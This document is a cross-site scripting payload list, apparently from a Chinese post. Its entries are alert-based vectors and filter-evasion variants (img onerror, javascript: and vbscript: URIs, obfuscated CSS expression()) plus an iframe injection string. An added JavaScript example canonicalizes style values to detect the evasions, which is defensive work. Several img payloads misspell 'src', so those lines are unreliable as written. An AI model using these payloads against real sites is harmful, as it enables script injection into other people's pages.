<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/* */ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
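
A filter that string-matches `expression` in a style value misses the comment, CSS-escape, HTML-entity and case variants in the list above. As an added example (not part of the original post), this JavaScript canonicalizes the value before matching once; the function names and sample strings are constructed for illustration.

```javascript
// Added example, not from the original post. Canonicalize a style value the
// way a lenient legacy parser would, then match once on the result.

// HTML numeric character references (&#x65; or &#101;), decoded first.
function decodeHtmlNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, ref) => {
    const cp = /^x/i.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// CSS escapes: backslash, 1-6 hex digits, one optional trailing whitespace.
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})[ \t\r\n\f]?/gi, (m, hex) => {
    const cp = parseInt(hex, 16);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

function canonicalizeStyle(value) {
  let s = decodeHtmlNumericRefs(value);
  s = s.replace(/\/\*[\s\S]*?\*\//g, ""); // strip comments before escapes
  s = decodeCssEscapes(s);
  return s.normalize("NFKC").toLowerCase(); // fold full-width forms and case
}

function hasCssExpression(value) {
  return /expression\s*\(/.test(canonicalizeStyle(value));
}

// Constructed sample values modelled on the variants in the list.
const samples = [
  "{left:exp/* */ression (alert('xss'))}",
  "{left:\\0065\\0078pression (alert('xss'))}",
  "{left:&#x0065;xpression (alert('xss'))}",
  "{left:expRessioN (alert('xss'))}",
  "left: 10px; color: red",
];
for (const v of samples) console.log(hasCssExpression(v), v);
```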